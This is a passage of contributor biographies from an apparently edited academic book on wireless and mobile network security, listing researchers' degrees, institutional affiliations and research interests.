telecommunications at the Department of Business Administration, Media, and Technology at Arcada
Polytechnic, Helsinki, Finland. His current research interests include mobile and wireless networking
and network security.

Stefanos Gritzalis holds a BSc in physics, an MSc in electronic automation, and a PhD in informatics,
all from the University of Athens, Greece. Currently he is an associate professor, the head of the Depart-
ment of Information and Communication Systems Engineering, University of the Aegean, Greece, and
the director of the Laboratory of Information and Communication Systems Security (Info-Sec-Lab). His
published scientific work includes several books and more than 150 journal and international conference
papers. The focus of these publications is on information and communication systems security. He was
a member (secretary general, treasurer) of the Board of the Greek Computer Society.

Yong Guan is an assistant professor in the Department of Electrical and Computer Engineering
at Iowa State University. He received his BS (1990) and MS (1996) in computer science from Peking
University, China, and his PhD (2002) in computer science from Texas A&M University. His research
interests are computer and network forensics, wireless and sensor network security, and privacy-enhanc-
ing technologies for the Internet. He received the Best Student Paper Award from the IEEE National
Aerospace and Electronics Conference in 1998, won 2nd place in the graduate category of the Interna-
tional ACM Student Research Contest in 2002, and was named the Litton Assistant Professor by Iowa
State University in 2007.

Mohamed Hamdi received his Engineering Diploma, Master Diploma, and PhD in telecommunica-
tions from the Engineering School of Communications (Sup’Com, Tunisia) in 2000, 2002, and 2005,
respectively. From 2001 to 2005 he worked for the National Digital Certification Agency (NDCA,
Tunisia) where he was head of the Risk Analysis Team. Dr. Hamdi was in charge of building the security
strategy for the Tunisian Root Certification Authority and of continuously assessing NDCA’s networked
infrastructure. He has also served on various national technical committees for securing e-government
services. Currently, Dr. Hamdi is serving as a contract lecturer for the Engineering
School of Communications at Tunis. He is also a member of the Communication Networks and Security
Lab (Coordinator of the Formal Aspects of Network Security Research Team), where he is conducting
research activities in the areas of risk management, algebraic modeling, relational modeling, intru-
sion detection, network forensics, and wireless sensor networks.

Munirul M. Haque is currently a PhD student at Purdue University. He received the MS degree
in computer science at Marquette University where he researched pervasive computing, security, and
privacy in the Ubicomp Research Lab. He completed the BS in computer science and engineering from
Bangladesh University of Engineering and Technology.

Jahan Hassan is a research fellow at the School of Information Technologies, University of Sydney.
She received her PhD in 2004 from University of New South Wales, Sydney, and Bachelor degree in
1995 from Monash University, Melbourne, both in computer science. She has published widely in peer-
reviewed conferences and journals. She was a member of the Technical Program Committee of IEEE
LCN 2006, IEEE ICC 2007, IEEE ISWPC 2007, IADIS AC 2006, and IADIS WAC 2007. She served
as a reviewer for many conferences and journals. Her research interests include mobile and wireless
networking architectures and wireless network security. Her current project focuses on the fast authen-
tication techniques for multiprovider access networks.

Artur Hecker received a diploma in computer science (Dipl.inform.) from the University of Karl-
sruhe (TH), Germany in 2001. In 2005, he received a PhD degree in computer science and networking
from the ENST, France. After his thesis, he worked as CTO of Wavestorm SAS, which he co-founded
in 2003. Since 2006, Dr. Hecker holds a position as associate professor at the INFRES department at
the ENST. His present research interests are wireless access security, security assurance of complex
systems, network and service management, and autonomous networking. Dr. Hecker is actively involved
in several IST FP6 and EUREKA CELTIC research activities.

Silke Holtmanns received her PhD in mathematics from the University of Paderborn (Germany),
Department of Computer Science and Mathematics. She has been a senior researcher at Nokia Research
Center since 2004. Before that, she was working in Ericsson Research Lab Aachen (Germany) as a
master research engineer and at the University of Paderborn as a scientific assistant. She has
30 publications and co-authored several books on mobile security. She is also rapporteur of six 3GPP
security specifications and reports and is involved in various standardization activities.

Ismail Khalil Ibrahim is a senior researcher and lecturer at the Institute of Telecooperation- Jo-
hannes Kepler University Linz, Austria, where he teaches, consults, and conducts research in mobile
multimedia applications and services, agent technologies, and information integration. He received his
MSc and PhD in computer engineering and information systems from Gadjah Mada University, Indonesia.
Dr. Ibrahim previously served as a research fellow at Intelligent Systems Group in the Netherlands and
as project manager at the Software Competence Center Hagenberg, Austria. He is the editor-in-chief of
Advances in Next Generation Mobile Multimedia book series and Journal of Mobile and Multimedia
Communications, and co-editor in chief of the International Journal of Web Information Systems (JWIS)
and the Journal of Mobile Multimedia (JMM). His research interests also include business, social, and
policy implications associated with the emerging Web technologies.

Biju Issac is a lecturer in the School of IT and Multimedia in Swinburne University of Technology
(Sarawak Campus), Malaysia. He is also the head of Network Security Research Group in the Informa-
tion Security Research Lab at Swinburne University Sarawak. He is an electronics and communication
engineer with a post graduate degree in computer applications. Currently he is doing part-time PhD in
networking and mobile communications in UNIMAS, Malaysia. His research interests are in wireless
and network security, wireless mobility, and IPv6 networks.

Tao Jiang is a research scientist at the Department of Electronic and Computer Engineering, University
of Michigan, Dearborn. He received BS and MS degrees in applied geophysics from China University of
Geosciences, Wuhan in 1997 and 2000, respectively, and a PhD degree in information and communication
engineering from Huazhong University of Science and Technology, Wuhan, P. R. China in April 2004.
From August 2004 to August 2005, he worked at Brunel University, London, as an academic visiting
scholar, and then moved to University of Puerto Rico in 2006. His current research interests include
the areas of wireless communications and corresponding signal processing, especially for OFDM and
MIMO systems, cooperative networks, cognitive radio, and ultra wideband communications.

John Felix Charles Joseph is currently pursuing a PhD in computer science at Nanyang Techno-
logical University, Singapore. His research interests include security in wireless and ad hoc networks,
computational intelligence, multicast routing security, and multimedia. He received his Bachelor of
Engineering in computer science from Madras University, India in 2002 and MS from Anna University,
India in 2005. His current work involves design of an intrusion detection algorithm for mobile wireless
ad hoc network environment.

Admela Jukan is a professor in electrical and computer engineering at the Technical University
Carolo Wilhelmina in Braunschweig, Germany. Prior to coming to TU Braunschweig, she was with
University of Illinois at Urbana Champaign (UIUC), Georgia Tech (GaTech), University of Quebec
(EMT-INRS), and Vienna University of Technology (TU Wien). From 2002-2004, she served as program
director in computer and networks system research at the National Science Foundation (NSF) in Arling-
ton, VA. While at NSF, she was responsible for funding and coordinating US-wide university research
and education activities in the area of network technologies and systems. She received the MSc degree
in information technologies and computer science from the Polytechnic of Milan, Italy, and the PhD
degree (cum laude) in electrical and computer engineering from the Vienna University of Technology
(TU Wien), Austria. Dr. Jukan is the author of numerous papers in the field of networking, and she has
authored and edited several books. She serves as a member of the Quality Assurance Committee for the
EU Network of Excellence, ePhoton/One. Dr. Jukan has chaired and co-chaired several international
conferences, including IFIP ONDM, IEEE ICC, and IEEE GLOBECOM. She serves on the editorial
board of the IEEE Communications Surveys and Tutorials. She is a senior member of the IEEE.

György Kálmán is a graduate student at UniK, University Graduate Center in Kjeller, Norway. His
research area covers personal and device authentication, security, and privacy in wireless systems. He
got his MSc degree in the area of communication networks from the Budapest University of Technology
and Economics. He was research fellow at Telenor R&I at the Media Platforms group.

Georgios Kambourakis received the diploma in applied informatics from the Athens University
of Economics and Business and the PhD in information and communication systems engineering from
the Department of Information and Communications Systems Engineering of the University of Aegean.
He also holds a MEd from Hellenic Open University. Dr. Kambourakis is a lecturer in the Department
of Information and Communication Systems Engineering of the University of the Aegean, Greece.
His research interests are in the fields of mobile and ad hoc networks security, VoIP security,
protocols, and PKI, and he has more than 35 publications in the above areas.

Jonny Karlsson has a BSc in information technology from Arcada Polytechnic, Helsinki Finland.
Since May 2002 he has been working at Arcada Polytechnic as a course assistant and course teacher
in programming and network security related courses and as a research assistant. His current research
interests include wireless and mobile network security.

Paris Kitsos received the BSc degree in physics in 1999 and a PhD in 2004 from the Department
of Electrical and Computer Engineering, both at the University of Patras. Currently he is a research fellow
with the Digital Systems & Media Computing Laboratory, School of Science & Technology, Hellenic
Open University (HOU). His research interests include VLSI design, hardware implementations of
cryptographic algorithms, and security protocols for wireless communication systems. Dr. Kitsos has
published more than 60 scientific articles and technical reports, and is a reviewer for
books, international journals, and conferences/workshops in the areas of his research. He has partici-
pated in international journals and conferences organization, as program/technical committee member
and guest editor.

Giorgos Kostopoulos received his diploma in electrical and computer engineering from the Elec-
trical & Computer Engineering Department, University of Patras, Greece in 2003. Since then he has
been working as a researcher engineer in the Department of Electrical and Computer Engineering of
the University of Patras. His research interests include security in wireless networks, new generation
networks architectures, security management in new generation networks, and communication networks.
Giorgos Kostopoulos has published more than 15 technical papers and book chapters in these areas. He
has also participated as senior engineer in European Research Projects.

Zbigniew Kotulski received his MSc in applied mathematics from Warsaw University of Technology
and PhD and DSc degrees from Institute of Fundamental Technological Research of the Polish Acad-
emy of Sciences. He is currently professor at IFTR PAS and professor and head of Security Research
Group at Department of Electronics and Information Technology of Warsaw University of Technology,
Poland. He is the author and co-author of three books and more than 150 research papers on applied
mathematics, cryptology, and information security.

Odysseas Koufopavlou received the Diploma of Electrical Engineering in 1983 and the PhD degree
in electrical engineering in 1990, both from University of Patras, Greece. From 1990 to 1994 he was at
the IBM Thomas J. Watson Research Center, Yorktown Heights, NY. He is currently a professor with
the Department of Electrical and Computer Engineering, University of Patras. His research interests
include computer networks, high performance communication subsystems architecture and implementa-
tion, VLSI low power design, and VLSI crypto systems. Dr. Koufopavlou has published more than 150
technical papers and received patents and inventions in these areas. He has participated as coordinator
or partner in many Greek and European R&D programs. He served as general chairman for the IEEE
ICECS’1999.

Geng-Sheng (G.S.) Kuo worked with R&D laboratories of the communications industry in the
United States, such as AT&T Bell Laboratories. In August 2000, he joined National Chengchi University,
Taipei, Taiwan as a professor. Since 2001, he has been invited as chair professor of Beijing University of
Posts and Telecommunications (BUPT) in Beijing, China. His current research interests include mobile
communications, wireless communications, and IP-networks. From 2001 to 2002, he was editor-in-chief
of IEEE Communications Magazine, whose impact factor in 2002 was 3.165. Currently, he is area editor
for Networks Architecture of IEEE Transactions on Communications, editor and ComSoc representative
to IEEE Internet Computing, editor of European Transactions on Telecommunications, and so forth.

Taekyoung Kwon is an assistant professor in Multimedia & Mobile Communications Lab., School
of Computer Science and Engineering, Seoul National University. He received his PhD, MS, and BS
degrees in computer engineering from Seoul National University in 2000, 1995, and 1993, respectively.
He was a visiting student at IBM T. J. Watson Research Center in 1998 and a visiting scholar at the
University of North Texas in 1999. His recent research areas include radio resource management, wire-
less technology convergence, mobility management, and sensor network.

Pekka Laitinen received his MSc degree in information sciences in Helsinki University of Technol-
ogy, Department of Engineering Physics and Mathematics. He is principal engineer in Nokia Research
Center where he has been working since 1996. His research interests include identity management and
applied security.

Björn Landfeldt received a BSc equivalent from the Royal Institute of Technology in Sweden. He
received his PhD from The University of New South Wales in 2000. Afterwards he joined Ericsson Research
in Stockholm as a Senior Researcher. In 2001, Dr. Landfeldt took up a position as a CISCO senior
lecturer in Internet Technologies at the University of Sydney. He has published more than 50 publica-
tions in international books, journals, and conferences. Dr. Landfeldt is serving on the editorial boards
of international journals and as a program committee member of many international conferences. His
research interests include wireless systems, systems modeling, mobility management, and QoS.

Peter Langendoerfer received his doctoral degree in 2001. Since 2000 he has been with the IHP in
Frankfurt (Oder) where he is leading the mobile middleware group. He has published more than 55 refer-
eed technical articles, filed seven patents in the security/privacy area, and worked as guest editor for
Journal of Super Computing (Kluwer), Computer Communications (Elsevier), Wireless Communications
and Mobile Computing (Wiley), and ACM Transactions on Internet Technology. He is/was also a TPC
member/chair of many conferences. His research interests include mobile communication (especially
privacy and security issues), protocol engineering, and automated protocol implementation.

Shahram Latifi, an IEEE fellow, received the Master of Science degree in electrical engineering
from Fanni, Teheran University, Iran in 1980. He received the Master of Science and the PhD degrees
both in electrical and computer engineering from Louisiana State University, Baton Rouge in 1986 and
1989, respectively. He is currently a professor of electrical engineering at the University of Nevada, Las
Vegas and director of the Center for Information and Communication Technologies (CICT). Dr. Latifi has
designed and taught graduate courses on security, image processing, computer networks, fault tolerant
computing, and data compression in the past 16 years. He has given seminars on the aforementioned
topics all over the world. He has authored over 120 technical articles in the areas of image processing,
document analysis, computer networks, fault tolerant computing, parallel processing, and data com-
pression. His research has been funded by NSF, NASA, DOE, Boeing, Lockheed, and Cray Inc. Dr.
Latifi is an associate editor of the IEEE Transactions on Computers and co-founder and general chair
of the IEEE International Conference on Information Technology. He is also a registered professional
engineer in the State of Nevada.

Bu-Sung Lee received his BSc (honors) and PhD from the Electrical and Electronics Department,
Loughborough University of Technology, UK in 1982 and 1987, respectively. He is currently associate
chair (research) with the School of Computer Engineering, Nanyang Technological University. He is
also the founding president of Singapore Research and Education Networks (SingAREN). He has been
an active member of several national standards organizations such as the National Grid Pilot Project.
His research interests are in network management, broadband, distributed, ad hoc and mobile networks,
network optimization, as well as grid computing.

Supeng Leng is an associate professor in the School of Communication and Information Engineering,
University of Electronic Science and Technology of China (UESTC). He received his BEng degree from
UESTC in 1996, and PhD degree from Nanyang Technological University (NTU), Singapore in 2005.
He has experience as an R&D engineer in the field of computer communications, and as a researcher
in the Network Technology Research Center, NTU. His research focuses on ad hoc/sensor networks,
wireless mesh networks, and broadband wireless networks.

Mo Li received the BE from Beijing University of Posts and Telecommunications. Then, he worked
for Lucent Technologies and Computer Associates (CA), where he has been involved in the design of
system architectures for DWDM/SDH/IP Backbone O&M systems. He is currently working toward the
PhD at the Faculty of Engineering, University of Technology, Sydney. His research interests include
handover management and trust-assisted networking.

Xinghua Li obtained his ME and PhD degrees in computer architecture and computer application
from Xidian University (Xi’an) in 2004 and 2006, respectively. Currently, Xinghua Li is the lecturer of
the School of Computer of Xidian University. His research interests include information and network
security.

Zheng-Ping Li received the BE degree at Department of Electronics and Information, Lanzhou
Railway University, Lanzhou, China, in 2000. He is currently working toward the PhD degree in the
School of Telecommunication Engineering, Beijing University of Posts and Telecommunications, Bei-
jing, China. His research interests include medium access control, routing, and intrusion detection in
wireless mesh networks.

Shiguo Lian, member of IEEE, SPIE, and EURASIP, got his PhD degree in multimedia security
from Nanjing University of Science and Technology in July 2005. He was a research assistant at City
University of Hong Kong from March to June in 2004, studying on multimedia encryption. He has
been with France Telecom R&D Beijing since July 2005, focusing on multimedia content protection,
including digital rights management (DRM), image or video encryption, watermarking and authentica-
tion, and so forth.

Chuang Lin is a professor and the former head of the Department of Computer Science and Technol-
ogy, Tsinghua University, Beijing, China. He received his PhD degree in computer science from Tsinghua
University in 1994. Professor Lin is a senior member of the IEEE, the Chinese Delegate in TC6 of IFIP,
and has served as associate editor for several journals. His current research interests include computer
networks, performance evaluation, logic reasoning, and Petri net theory and its applications. He has
co-authored more than 200 papers in research journals and IEEE conference proceedings in these areas
and has published three books.

Bin Lu is an assistant professor in the Department of Computer Science at West Chester University
of Pennsylvania. Dr. Lu received her BS (1996) and MS (1998) degrees in computer science from Harbin
Institute of Technology, China, and her PhD (2005) in computer science from Texas A&M University.
Her research interests include network security, quality of service, and wireless networks.

Jianfeng Ma received his BS degree in mathematics from Shaanxi Normal University (Xi’an) in 1985,
and obtained his ME and PhD degrees in computer software and communications engineering from
Xidian University (Xi’an) in 1988 and 1995, respectively. Professor Ma is a member of the executive
council of the Chinese Cryptology Society. Currently, Professor Ma is the director of the Ministry of
Education Key Laboratory of Computer Networks and Information Security, and he is the dean of the
School of Computer of Xidian University. His research interests include information security, coding
theory, and cryptography.

Ismat K. Maarouf obtained his BS degree in computer engineering in 2005 and an MS degree in
computer networks in 2007 from King Fahd University of Petroleum and Minerals (KFUPM), Dhahran,
Saudi Arabia. He is currently working as a research assistant in the Computer Engineering Department
in KFUPM. His main research interests include mobile ad hoc and wireless sensor networks, computer
networks security, reputation systems, and WLAN-Cellular networks integration.

Michael Maaser received his Master’s degree in computer science from Brandenburg University
of Technology Cottbus in 2004. After his thesis about negotiation of privacy he started as a research
scientist at IHP. His research focuses on privacy preserving techniques mainly, but not limited to, the
field of location-based services. Throughout the recent 2 years he has seven publications in
the area of privacy and two filed patents.

Ashraf S. Hasan received the BSc degree in electrical and computer engineering from Kuwait Uni-
versity in 1990, and the MEng in engineering physics (computer systems) from McMaster University,
Hamilton, Canada in 1992. He received his PhD in systems and computer engineering from Carleton
University, Ottawa, Canada in 1997. During 1997-2002, he was with Nortel Networks Research and De-
velopment where he focused on development and evaluation of radio resource management algorithms
for broadband and 3G networks. Since 2002, he has been with the Computer Engineering Department at
King Fahd University of Petroleum and Minerals, Dhahran, KSA as an assistant professor. His research
interests include radio resource management for 3rd and 4th G networks, wireless local area networks,
and integration of heterogeneous networks.

Amel Meddeb Makhlouf received the engineering degree (in 2001) and the Master degree in com-
munications (in 2003) from the Engineering School of Communications (SUP’COM, Tunisia). She is
member of the Communication Networks and Security (CN&S) Research Laboratory (University of
November 7th, Carthage, Tunisia). In September 2004, she joined the Engineering School of
Communications (SUP’COM, TUNISIA) as a teacher assistant in telecommunications.

Leonardo A. Martucci is a doctoral student at Karlstad University, Sweden, where he works with
research on privacy enhancing technologies for wireless environments. He is involved in education,
research, deployment, and industrial projects in the field of wireless network security since
2001. Mr. Martucci’s research is focused especially on privacy problems in dynamic and distributed
environments, such as mobile ad hoc networks. He holds a Licentiate in engineering from Karlstad
University (2006), a Masters in electrical engineering (2002), and an electrical engineer degree (2000)
from University of São Paulo, Brazil.

Geyong Min is a senior lecturer in the Department of Computing at University of Bradford, United
Kingdom. He received the PhD degree in computing science from University of Glasgow, UK, in 2003.
His research interests include performance modeling and simulation, network traffic engineering,
computing and wireless networks, multimedia systems, and information security. Dr. Min has published
over 100 research papers in the well-established journals and conferences. Dr. Min serves on the edito-
rial board of the International Journal of Wireless and Mobile Computing and Journal of Simulation
Modeling Practice and Theory, and serves as the guest editor for 10 international journals.

Lawan A. Mohammed is currently an assistant professor in Computer Science and Engineering
Technology Department at King Fahd University of Petroleum and Minerals (HBCC Campus), Saudi
Arabia. His main research interests are in the design of authentication protocols for both wired and
wireless networks, wireless mobility, group oriented cryptography, smartcard security, and mathemati-
cal programming.

Rebecca Montanari graduated from University of Bologna, Italy, where she received PhD degree in
computer science engineering in 2001. She is now an associate professor of computer engineering at the
University of Bologna. Her research primarily focuses on policy-based networking and systems/service
management, mobile agent systems, security management mechanisms, and tools in both traditional
and mobile systems. She is member of IEEE and AICA.

Luminita Moraru is currently a PhD candidate in the TCS-sensor lab of the Computer Science De-
partment of the University of Geneva. She received a BS degree in electrical engineering and computer
science from the Polytechnic University of Bucharest, in 2004, and a MS degree in computer science
(embedded systems) from the University of Science and Technology of Lille, in 2005. Her research in-
terests are in sensor networks, mobile ad hoc networks, security, and reputation based trust. Her current
research focuses on security and QoS of routing protocols for sensor networks.

A. R. Naseer is an assistant professor in Department of Computer Engineering at King Fahd Uni-
versity of Petroleum and Minerals, Dhahran, KSA. He received the PhD degree in computer science
and engineering from Indian Institute of Technology (IIT), Delhi, India, in 1996. He is a recipient of
“Best Student Paper Award” at the IEEE/ACM 7th International Conference on VLSI Design, 1994 for
his doctoral research paper in the area of FPGA based synthesis. His current research interests include
wireless sensor networks security, reputation systems, computer networks, design automation of digital
systems, FPGA based synthesis, computer architecture, parallel computing, and multicore processor
architectures. He has published several refereed journal and conference papers on related topics.

Huansheng Ning received BS degree from Anhui University, China, in 1996, and a PhD degree from
Beihang University, China, in 2001. From 2002 to 2003, he was the CTO of Aerospace Golden Card
Company. Since 2004, he has been an associate professor in Beihang University. His current research
interests include RFID, EM computing, ITS, and so forth.

Josef Noll holds a professor stipend from the University of Oslo in the area of mobile services.
Working areas include mobile authentication, wireless broadband access, personalized services, and the
evolution to 4G systems. He is also senior advisor in Movation, Norway’s leading innovation company
for mobile services. Previously he was senior advisor/group leader at Telenor R&I, project leader of
“Operators’ Vision on Systems Beyond 3G” and other international projects, use-case leader in the EU
“Adaptive Services Grid (ASG)” project, and has initiated a.o. the EU’s 6th FP ePerSpace and several
ITEA and Eurescom projects.

Christoforos Ntantogian received his BSc degree in computer science and telecommunications
from the Department of Informatics and Telecommunications, University of Athens, Greece. In 2006 he
finished his postgraduate studies in computer systems technology in the same department, where
he is a PhD student. Since 2004 he has been working for the Communication Networks Laboratory of
the University of Athens and he is a member of the Security Group.

Sangheon Pack received the BS (2000) and PhD (2005) degrees from Seoul National University,
both in computer engineering. Since March 2007, he has been an assistant professor in the School of
Electrical Engineering, Korea University, Korea. From July 2006 to February 2007, he was a postdoctoral
fellow at Seoul National University. From 2005 to 2006, he was a postdoctoral fellow in the Broadband
Communications Research (BBCR) Group at University of Waterloo, Canada. His research interests
include mobility management, multimedia transmission, and QoS provision issues in next-generation
wireless/mobile networks. He is a member of the ACM and the IEEE.

Luis E. Palafox received his BS in computer engineering from the University of Baja California
in 1997. He also received his MS degree in digital systems from the National Polytechnic Institute of
Mexico in 2002. In 2004, he enrolled in the PhD program in computer science at the CICESE
Research Center in Ensenada. He has been a faculty member of the School of Chemical Science and Engi-
neering at the University of Baja California since 1999. His areas of interest are computer networking,
embedded systems, wireless sensor networks, and digital signal processing.

Cyrus Peikari, MD, is a practicing physician and author of several leading technical security books,
including Security Warrior from O’Reilly and Maximum Wireless Security from SAMS. In his work
with Airscanner Corporation he pioneered some of the first antivirus solutions for handheld
devices. His main area of research is in reverse engineering of “airborne viruses.” Dr. Peikari has been
a popular speaker and keynote at several major security conferences.

Steffen Peter received his diploma in computer science from the Brandenburg University of Tech-
nology at Cottbus (BTU) in 2006. In 2006 he joined the IHP in Frankfurt (Oder), where he was also
involved in developing a hardware TCP accelerator as a student. In his diploma thesis he was developing
hardware cryptography accelerators. He is a member of the mobile middleware group, working on the
research of solutions for security issues in wireless sensor networks. He has filed three patents and
authored two technical papers. His research interests include security and privacy in mobile environ-
ments focusing on efficient hardware implementation.

Krzysztof Piotrowski received his Master in computer science from the University of Zielona Gora
(Poland) in 2004. Since 2004, he has been with the IHP in Frankfurt (Oder) where he is a member of
the mobile middleware group. He published 15 refereed technical articles in the area of security and
privacy. His research interests include mobile/wireless communication (focus on privacy and security
issues), especially on resource-constrained devices (wireless sensor networks).

Olivier Powell is a senior researcher at the Computer Science Department of the University of Ge-
neva in Switzerland. He was previously a Swiss National Research Foundation fellow at the Research
and Academic Computer Technology Institute and the University of Patras in Greece. Previously, he
was a post-doctoral research associate at the TCS-sensor lab of the University of Geneva. He received
a PhD in computer science in the field of complexity theory from the University of Geneva and a
degree in mathematics from the same university. His current research interest is algorithmic aspects of
wireless sensor networks.

Göran Pulkkis, Dr. Tech. from Helsinki University of Technology, is presently senior lecturer in
computer science and engineering at the Department of Business Administration, Media, and Technology
at Arcada Polytechnic, Helsinki, Finland. His current research interests are network security, applied
cryptography, and quantum informatics.

Slim Rekhis holds a PhD and a Master degree in telecommunications from the Engineering School
of Communications (SUP’COM, Tunisia). He is conducting research activities in the area of digital
investigation of security incidents, formal modelling, intrusion detection and tolerance, and wireless
security. Since September 2005, Dr. Rekhis has been an assistant professor in telecommunications.

Angelos Rouskas received the Diploma in Electrical Engineering from the National Technical Uni-
versity of Athens (NTUA), the MSc in communications and signal processing from Imperial College,
London, and the PhD in electrical and computer engineering from NTUA. He is an assistant professor in
the Department of Information and Communication Systems Engineering of the University of Aegean,
Greece, and director of the Computer and Communication Systems Laboratory. Dr. Rouskas has been
involved in several European and Greek funded research projects and has published extensively in the
field of mobile and wireless communication networks.

Miguel A. Ruiz was born in Valdepeñas (Ciudad Real), Spain. He received the Technical Telecom-
munication Engineering and Telecommunication Engineering degrees from the Polytechnic School
at the University of Alcala (Madrid), Spain, in 1999 and 2003, respectively. He is currently working
toward the PhD degree in telecommunications at University Alcala. Since 2000, he has been working
in the Electromagnetic Compatibility Laboratory as technical manager at the High Technology and
Homologation Center (CATECHOM), research support center of the University Alcala. Furthermore, he
is an assistant lecturer at the Electronic Department of the same university. His main research interest
is EMC effects on electrical and electronic automotive systems.

Kumbesan Sandrasegaran holds a PhD in electrical engineering from McGill University (Canada)
(1994), a Masters of Science degree in telecommunication engineering and information Systems from
Essex University (UK) (198?), and a Bachelor of Science (honors) degree in electrical engineering (first
class) (UZ) (1985). Dr Sandrasegaran is a professional engineer (Pr.Eng) (ECSA) and has more than
20 years experience working as a practitioner, researcher, consultant, and educator in telecom-
munication networks. During this time, he has focused on the planning, optimization, forecasting,
security, and network management of telecommunication networks. At present, he is program head of
ICT Engineering at the Faculty of Engineering, University of Technology Sydney (UTS).

David Sanguino was born in Talavera de la Reina (Toledo), Spain. He received the technical tele-
communication engineering degree from the Polytechnic School at the University of Alcala (Madrid),
Spain, in 2004. He is currently working toward the telecommunication engineering degree at University
Alcala (UAH). Since 2005, he has been working in the Electromagnetic Compatibility Laboratory as
Technician at the High Technology and Homologation Center (CATECHOM), research support center
of the University of Alcala.

Boot-Chong Seet received his PhD in 2005 from the School of Computer Engineering, Nanyang
Technological University (NTU), where he is currently serving as an instructional faculty. Prior to join-
ing NTU, he was with the Singapore-MIT Alliance (SMA), National University of Singapore, where
he worked as a research fellow for a pilot project on adaptive location-aware computing. His current
research interests include ad hoc, mesh, and sensor networks, mobile peer-to-peer computing, vehicular
communications, and emerging broadband wireless technologies. He has over 20 refereed publications
and one patent pending. He is a member of IEEE and ACM SIGMOBILE.

Jean-Marc Seigneur is a senior researcher and lecturer at the University of Geneva. He received his
MSc and PhD in computer science from Trinity College Dublin. His more than 30 international scientific
publications cover ubiquitous computing security, trust, reputation, and privacy. He is an international
expert reviewer for French ANR security research projects and the European Commission. He worked
in Hewlett-Packard in France and China. He leads the http://www.trustcomp.org online community on
computational trust management with now more than 190 academic and industrial members. He has
provided technical consulting and presentations to many companies, among them, Philips, Ericsson,
SAP, and Amazon.

Moushumi Sharmin is currently a PhD student at University of Illinois. She received the MS degree
in computer science at Marquette University where she researched pervasive computing, security, and
privacy in the Ubicomp Research Lab. She completed the BS in computer science and engineering from
Bangladesh University of Engineering and Technology.

Nicolas Sklavos received the PhD degree in electrical and computer engineering, and the diploma in
electrical and computer engineering, in 2004 and 2000, respectively, both from the Electrical & Computer
Engineering Department, University of Patras, Greece. His research interests include cryptography,
wireless communications security, computer networks, and VLSI design. He holds an award for his
PhD thesis on “VLSI Designs of Wireless Communications Security Systems” from IFIP VLSI SOC
2003. He was the general co-chair of MobiMedia’07. He has participated in the organization of international
journals and conferences as program committee member and guest editor. Dr. N. Sklavos is a member
of the ACM, IEEE, IEE, the Technical Chamber of Greece, and the Greek Electrical Engineering So-
ciety. He has authored or co-authored up to 90 scientific articles, book chapters, and tutorials
in the areas of his research.

Nilothpal Talukder is a graduate student in computer science at Marquette University where he re-
searches pervasive computing, security, and privacy in the Ubicomp Research Lab. He completed the BS
in computer science and engineering from Bangladesh University of Engineering and Technology.

Daniela Tibaldi graduated from University of Bologna, Italy, where she received her PhD degree
in computer science engineering in 2006. Her research activity is focused on middleware solutions for
supporting the secure service provisioning in mobile and heterogeneous environments. Since 2002 she
has worked at the DSAW – Direction and Development of Web Activities of the University of Bologna with
both technical and quality management responsibilities. One of the DSAW main tasks is to build the
University Web sites, services, and the corresponding technological, informative, and organizational
infrastructure to fully support University educational, academic, and administrative activities.

Tom Tofigh is a principal and technical member of the AT&T architecture team. He is responsible
for architecture studies and vendor technology evaluation. Currently, he supports the AT&T labs ad-
vanced services and architecture group. Tom has worked in semiconductor companies as director of
product management, director of software development, and has consulted and worked for a number
of start-ups and had responsibility for architecture and developments of switches and access products.
In addition Tom attended George Washington University and completed his doctoral course work in
electrical engineering and computer science graduate school. Furthermore, Tom has a judicial doctoral
degree from Northern Virginia Law School with emphasis in intellectual properties. Currently, Tom is
the founder and chair of the WiMAX Forum’s Application Architecture Working Group.

Alessandra Toninelli graduated from University of Bologna, Italy, where she is currently a PhD
student in computer science engineering. Her research interests focus on semantic-based middleware
supports for service provisioning, context-aware services, security solutions for pervasive environments,
policy-based service management, and mobile agent systems. She is a member of IEEE and ACM.

Denis Trček is principal investigator at Jozef Stefan Institute and has been involved in
computer networks, security, and privacy for almost 20 years. He has taken part in various European
projects, as well as domestic projects in government, banking, and insurance sectors. His bibliography
includes over one hundred titles, including works published by renowned publishers like Springer and
Wiley. D. Trcek has served (and still serves) as a member of various international boards, from editorial
to professional ones. He is inventor of a patented family of light-weight cryptographic protocols. His
interests include e-business, security, trust management, privacy, and human factor modelling.

Yu Wang received the PhD degree in computer science from Illinois Institute of Technology in
2004, and the BEng degree and the MEng degree in computer science from Tsinghua University, China,
in 1998 and 2000. He has been an assistant professor of computer science at the University of North
Carolina at Charlotte since 2004. His current research interests include wireless networks, ad hoc and
sensor networks, mobile computing, and algorithm design. He has published more than 50 papers in
peer-reviewed journals and conferences. Dr. Wang is a recipient of Ralph E. Powe Junior Faculty En-
hancement Awards from Oak Ridge Associated Universities.

Yawen Wei is a PhD candidate in the Department of Electrical and Computer Engineering at Iowa
State University. She obtained her BEng (2004) in electronic engineering from Tsinghua University,
China. Since then she has been doing research on localization security issues and location-based ser-
vices in wireless sensor networks.

Bing Wu is an assistant professor in the Department of Mathematics and Computer Science at
Fayetteville State University. Dr. Wu received his PhD and MS in the Department of Computer Sci-
ence and Engineering at Florida Atlantic University. His research interests include wireless ad hoc and
sensor networks, mobile computing, and network security. He has worked as research assistant for four
years at Motorola. He has published more than ten papers including refereed journal, book chapter, and
conference proceedings. He is a member of IEEE.

Jie Wu is a distinguished research professor at the Department of Computer Science and Engineering, Florida Atlantic University and a program director at US National Science Foundation. He has published over 350 papers in various journals and conference proceedings. His research interests are in the areas of wireless networks and mobile computing, routing protocols, fault-tolerant computing, and interconnection networks. Dr. Wu was on the editorial board of IEEE Transactions on Parallel and Distributed Systems and was a co-guest-editor of IEEE Computer and Journal of Parallel and Distributed Computing. He served as the program co-chair for MASS 2004, program vice-chair for ICDCS 2001, and program vice-chair for ICPP 2000. He was also general co-chair for MASS 2006 and is general chair for IPDPS 2008. He is the author of the text Distributed System Design published by the CRC press. He was also the recipient of the 1996-97, 2001-02, and 2006-07 Researcher of the Year Award at Florida Atlantic University. Dr. Wu has served as an IEEE Computer Society Distinguished Visitor and is the chairman of IEEE Technical Committee on Distributed Processing (TCDP). He is a member of ACM and a senior member of IEEE.

